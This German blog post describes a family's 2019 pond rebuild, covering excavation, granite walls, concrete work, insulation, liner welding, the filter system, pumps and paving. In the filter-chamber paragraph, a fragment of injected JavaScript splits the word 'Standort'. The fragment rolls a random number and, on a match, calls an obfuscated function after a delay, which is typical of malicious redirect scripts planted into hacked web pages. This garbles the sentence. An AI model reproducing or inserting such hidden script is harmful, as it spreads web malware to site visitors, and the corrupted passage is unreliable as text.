NEU: Teichumbau 2019

Nachdem unser erster Teich 2002 größer gebaut wurde, hat er nach 17 Jahren ausgedient.
Max hat sich dieser Baustelle angenommen und hat unser Riesenprojekt gestartet.
Als Erstes wurde der Teich ausgepumpt und die Folie mit dem Bagger herausgerissen und entsorgt.
Danach wurden die Granitsteine, die als Umrandung da waren, entfernt und die Filterkammern und dessen Bodenplatte ausgebaggert.
Nach einigen Schaufeln haben wir wieder einmal gesehen, dass ab 40 cm nur noch Flins und Granit auf uns zu kam!
Nach kurzer Besprechung war klar, dass wir noch 3 Tage mehr Baggerarbeiten haben,
denn wir haben uns darauf geeinigt, den Hang, an dem der Wasserfall war, komplett neu zu gestalten.
Eine große, lange und wuchtige Mauer aus Granitsteinen entstand nach und nach und diese Steine sind alle aus diesem alten Teich gekommen!

Nach zwei Tagen nur mit einem Meißelbagger konnten wir schließlich die Erdarbeiten fürs Erste abschließen.
Mit einem Betonmischer wurde der relativ trockene Beton ins Loch geschüttet und wir konnten mit der ersten Mauerreihe beginnen und diese „ins Wasser“ richten.
Nachdem wir die Rohre durch diese erste Reihe eingearbeitet haben und diese ausgehärtet war, begann das Steine schlichten und Eisen einlegen.
Über 1000 Steine haben wir für dieses Projekt benötigt!
Danach wurden die Bodenabläufe und die Durchbrüche für den Skimmer und die Rückläufe gesetzt.
Die Steine wurden danach mit einer Betonpumpe ausgefüllt und oben bündig abgezogen um eine glatte Fläche zu generieren.
Zu guter Letzt wurde dann eine Feinschicht am Boden gezogen, damit dieser eben ist.

Der rechte lange Teil wurde auch auf diese Tiefe ausgebaggert und gemauert da, wir auf dem Granit nirgendwo drüber mauern konnten.
Dieser Teil sowie die Flachwasserzone wurden dann wieder mit dem vorher ausgehobenen Material unter ständigem Verdichten aufgefüllt.
Hierbei wurden dann Leerrohre, Wasser- und Stromleitungen sowie eine Wasserrückleitung verlegt.
Danach wurde mit Frostschutz/Mineralbeton aufgefüllt und verdichtet, damit darauf das Pflaster gelegt werden kann.
Nachdem die Feinschicht der Flachwasserzone betoniert wurde, ist der Teich mit 3 cm Styrodur isoliert worden.

Nach der Isolierung wurde ein dickes Vlies im Teich angebracht, um Schutz für die Folie zu bieten.
Die Folie (ca. 120 m²) wurde in Rekordzeit verschweißt und ist nach dem Auffüllen sofort dicht und absolut faltenfrei und das bei dem Wetter mit 38-40 Grad!
Dann wurde es Zeit die Filterkammer zu betonieren, perfekter Standom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dort, denn das tote Eck unten im Garten hätte sonst niemand gebrauchen können! 😉
Max durfte bei diesen anhaltenden Temperaturen mauern und 3 cm dickte Granitplatten verlegen, welche jede einzeln geschnitten werden musste. Respekt!
Innen wurde die Filterkammer noch isoliert um gegen den Winter geschützt zu sein, die Abdeckung ist noch in Arbeit.

Dann wurde es Zeit die Filter zu installieren.
Es wurde ein Vortex mit Bürstenkranz 1,25 Meter Durchmesser, eine Hel-X Kammer mit 1000 Liter und eine Patronenkammer mit 1000 Liter angeschlossen.
Betrieben wird diese Anlage mit einer 20.000 und einer 15.000 Liter Pumpe.
Zusätzlich ist noch eine 15.000 Liter Pumpe angeschlossen, welche bei Bedarf als Wasserfall betrieben werden kann.
Dann wurde der Strom mit 3 separaten Leitungen verlegt. Damit könnte die Anlage mit Wärmepumpe etc. bis zu 10 kW/h betrieben werden.
Danach wurde das Pflaster in der Liegefläche verlegt und mit einem Pflasterfugenmörtel ausgefugt. Währenddessen hieß es Wasser marsch! 🙂
Um den Teich- und Technikbereich größtenteils abzuschließen wurde unsere Abdeckung geliefert und montiert.
Diese erstrahlt in Japanrot und jedes Element kann beliebig auf den Schienen bewegt werden.
Danach noch Split auffüllen, die Granitpagode aufbauen, Trittsteine und Pflaster fertig verlegen.